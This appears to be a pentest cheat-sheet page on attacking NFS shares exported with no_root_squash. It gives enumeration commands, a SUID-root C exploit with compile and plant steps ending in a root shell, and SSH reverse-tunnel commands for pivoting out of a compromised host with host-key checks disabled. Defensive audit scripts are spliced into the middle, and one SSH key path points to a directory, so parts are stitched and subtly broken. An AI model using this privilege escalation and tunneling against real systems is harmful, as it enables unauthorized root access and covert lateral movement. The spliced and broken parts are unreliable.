
๐Ÿ“ NFS (Network File System) โ€‹

NFS allows sharing directories over a network. In some misconfigured cases (especially with no_root_squash), an attacker can gain root privileges remotely.

📚 Resources

General Tricks

Exploit

Tools

🔎 Enumeration

Basic commands to discover and list available NFS shares on a target:

```bash
# List exported shares on the target
showmount -e <target-ip>

# Check if the port is open (2049/tcp)
nmap -p 2049 --script=nfs* <target-ip>

# Mount the export manually
sudo mount -t nfs <target-ip>:/shared/folder /mnt/nfs

# Use NFSv3 and disable file locking
sudo mount -t nfs -o nolock,nfsvers=3 $IP:/shared/folder /mnt/nfs
```

๐Ÿ” Squashing โ€‹

The squash mechanism controls how NFS handles user permissions. This is where the main vulnerability lies.

  • all_squash: Maps all UID/GID to nobody (UID 65534). No real users are recognized.
  • root_squash (default): Only the root user (UID 0) is mapped to nobody. All other UID/GIDs are respected.
  • no_root_squash: No mapping is performed, not even for root. This mode is dangerous as it allows a remote root user to keep their privileges.

โš™๏ธ Config File โ€‹

NFS exports are defined in /etc/exports.

```txt
/opt/shared/ 127.0.0.1(insecure,rw,sync,no_subtree_check,no_root_squash)
```

This configuration is vulnerable because it uses no_root_squash.
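As an added example (not code from the original page), a small POSIX-shell auditor for the squash and security options described above: it reads a file in the /etc/exports format, flags entries that use no_root_squash or insecure or that export to every client, and rewrites an export line to the squashing defaults. The sample exports file is constructed for the demo; its first line is the page's vulnerable export, and the function names are this example's own.

```shell
#!/bin/sh
# Added example, not part of the original page: audit an exports file for
# risky options and show the hardened form of one export line.
# The sample file written by make_sample_exports is constructed for the demo.

# Print "<path> <client>: <reason>..." for every client entry that exports with
# no_root_squash, with insecure (client ports above 1023 accepted), or to any client.
audit_exports() {
  file=$1
  set -f                                   # no globbing: client specs may contain '*'
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in ''|'#'*) continue ;; esac
    set -- $line                           # $1 = export path, $2.. = client(options) entries
    if [ $# -lt 2 ]; then continue; fi
    path=$1; shift
    for entry in "$@"; do
      client=${entry%%\(*}                 # text before '('; '*' or empty means every client
      opts=""
      case "$entry" in *\(*\)) opts=${entry#*\(}; opts=${opts%\)} ;; esac
      reason=""
      case ",$opts," in *,no_root_squash,*) reason="$reason no_root_squash" ;; esac
      case ",$opts," in *,insecure,*)      reason="$reason insecure" ;; esac
      case "$client" in ''|'*')            reason="$reason world_export" ;; esac
      if [ -n "$reason" ]; then echo "$path $client:$reason"; fi
    done
  done < "$file"
  set +f
  return 0
}

# Rewrite one export line: no_root_squash -> root_squash, insecure -> secure.
# Option names are matched between '(' ',' ')' so that insecure_locks is left alone.
harden_export_line() {
  printf '%s\n' "$1" | sed \
    -e 's/\([(,]\)no_root_squash\([,)]\)/\1root_squash\2/g' \
    -e 's/\([(,]\)insecure\([,)]\)/\1secure\2/g'
}

# Constructed sample (not a real server's file); the first export is the page's vulnerable one.
make_sample_exports() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
# constructed sample exports file
/opt/shared/   127.0.0.1(insecure,rw,sync,no_subtree_check,no_root_squash)
/srv/backup    10.0.0.0/24(ro,sync,root_squash)
/srv/public    *(rw,all_squash)
EOF
  echo "$f"
}

# Demo run; on a real server call  audit_exports /etc/exports
sample=$(make_sample_exports)
echo "Findings:"; audit_exports "$sample"
echo "Hardened:"; harden_export_line '/opt/shared/ 127.0.0.1(insecure,rw,sync,no_subtree_check,no_root_squash)'
rm -f "$sample"
```

The audit reports the first sample line for both no_root_squash and insecure, stays silent on the root_squash export, and flags the wildcard export regardless of its other options, since all_squash limits what a client can do but not who can connect. After editing /etc/exports, `exportfs -ra` reloads the table on the server.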

💥 Exploit

When an NFS export is mounted with no_root_squash, an attacker can:

  1. Mount the NFS share as root on their machine:

```bash
# mount nfs share
sudo mount -t nfs $IP:/opt/shared /mnt/shared
```

  2. Create a SUID root binary inside this folder:

```c
// exploit.c
#include <stdlib.h>
#include <unistd.h>

int main(void) {
  // The SUID bit only sets the effective UID to 0; set the real UID too,
  // otherwise bash drops the privileges on startup.
  setreuid(0, 0);
  system("/bin/bash");
  return 0;
}
```

```bash
gcc exploit.c -o exploit -static

# the share was mounted at /mnt/shared in step 1
mv exploit /mnt/shared/
chmod +x /mnt/shared/exploit
chmod +s /mnt/shared/exploit
```

  3. Run the binary on the vulnerable machine as any user:

```bash
./exploit
```

Result:

```bash
> id
uid=0(root) gid=0(root) groups=0(root)
```
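From the defender's side, as an added example that is not part of the original page: the client-side mount options nosuid and noexec make a planted setuid binary harmless even when the server squashes nothing, and a periodic scan of the export for setuid files catches one that was dropped. Both checks below are POSIX shell; the mount-table sample, the file names and the function names are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original page: two checks for the SUID-binary
# scenario. nfs_mount_gaps reads mount-table lines (the /proc/mounts format)
# from stdin and reports NFS mounts that lack nosuid or noexec.
# find_setuid_files lists setuid/setgid regular files under a directory
# (an export root on the server, or a mount point on a client) for one owner.

# Print "<mountpoint> missing:<opt>[,<opt>]" for each nfs/nfs4 mount lacking nosuid or noexec.
nfs_mount_gaps() {
  while read -r src mnt fstype opts rest; do
    case "$fstype" in nfs|nfs4) ;; *) continue ;; esac
    missing=""
    case ",$opts," in *,nosuid,*) ;; *) missing="${missing}nosuid," ;; esac
    case ",$opts," in *,noexec,*) ;; *) missing="${missing}noexec," ;; esac
    if [ -n "$missing" ]; then echo "$mnt missing:${missing%,}"; fi
  done
  return 0
}

# List regular files with the setuid or setgid bit under $1 owned by $2 (default root),
# one path per line. Unreadable subtrees are skipped rather than aborting the scan.
find_setuid_files() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -user "${2:-root}" -print 2>/dev/null || true
}

# Constructed mount-table sample; the first line mirrors the page's mount with no hardening.
sample_mounts() {
  cat <<'EOF'
10.0.0.5:/opt/shared /mnt/shared nfs rw,relatime,vers=3,nolock,addr=10.0.0.5 0 0
10.0.0.5:/srv/data /mnt/data nfs4 rw,nosuid,noexec,relatime,vers=4.2 0 0
/dev/sda1 / ext4 rw,relatime 0 0
EOF
}

# Demo; on a live host use:  nfs_mount_gaps < /proc/mounts   and   find_setuid_files /opt/shared
sample_mounts | nfs_mount_gaps
```

Run `nfs_mount_gaps < /proc/mounts` on clients and `find_setuid_files /opt/shared` on the server; any output from either is worth an alert. nosuid on the client is a mitigation the server cannot enforce, so the export itself still needs root_squash.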

๐ŸŒ Network Access and SSH Tunneling โ€‹

If the NFS port (2049) is not directly accessible from your machine, but you have access to an intermediate host on the network, you can use SSH tunneling to forward the port and mount the NFS share locally.

Example: SSH Local Port Forwarding

```bash
ssh -L 2049:127.0.0.1:2049 user@pivot-host
sudo mount -t nfs 127.0.0.1:/opt/shared /mnt/shared
```

Remote Reverse Shell + Tunnel Setup

If this exploit is performed from a reverse shell, ssh has no terminal to prompt for a password, so the connection runs with BatchMode=yes and must authenticate with an SSH key:

```bash
# On the pivot server:

ssh-keygen -t ed25519 -f ~/.ssh/pwn_key
cat ~/.ssh/pwn_key.pub >> ~/.ssh/authorized_keys
```

```bash
# Create SSH tunnel from the compromised machine back to the pivot host
# -i: the private key (pwn_key) copied to the compromised machine

ssh -n -i /tmp/tmp.0oKnrS9g1v/ \
    -o UserKnownHostsFile=/dev/null \
    -o BatchMode=yes \
    -o StrictHostKeyChecking=no \
    -N -R 2049:127.0.0.1:2049 user@pivot-host

# Alternatively, you can use nohup for persistence:
# nohup ssh -Nf -R 1234:127.0.0.1:2049 -p 4444 user@ip &
```

```bash
# On the pivot host:

sudo mount -t nfs 127.0.0.1:/opt/shared /mnt/
```